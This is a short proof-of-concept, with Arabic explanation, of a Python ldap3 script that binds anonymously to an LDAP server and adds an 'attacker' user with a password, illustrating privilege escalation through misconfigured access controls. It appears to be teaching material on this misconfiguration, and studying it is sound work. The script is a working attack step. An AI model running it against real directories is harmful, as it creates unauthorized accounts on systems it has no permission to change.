
إثبات مفهوم بلغة بايثون لتصعيد الامتيازات عبر الربط المجهول في LDAP، يحاكي قوائم التحكم في الوصول (ACLs) غير الآمنة لإنشاء مستخدمين بصلاحيات إدارية عبر عمليات ربط LDAP غير مصادَق عليها.
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL
# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")
تم إعداد دليل LDAP بشكل غير صحيح للسماح بالربط المجهول كما يمنح صلاحيات كتابة للسمات الحساسة (مثل userPassword). يمكن للمهاجم الربط بشكل مجهول وإنشاء مستخدم إداري جديد، مما يؤدي إلى تصعيد الصلاحيات.
شغّل المحاكاة (يتطلب خادم LDAP فعليًا لإجراء اختبار حقيقي، لكننا نعرض المفهوم):
python ldap_anon_sim.py
يحاول السكربت إضافة مستخدم بشكل مجهول.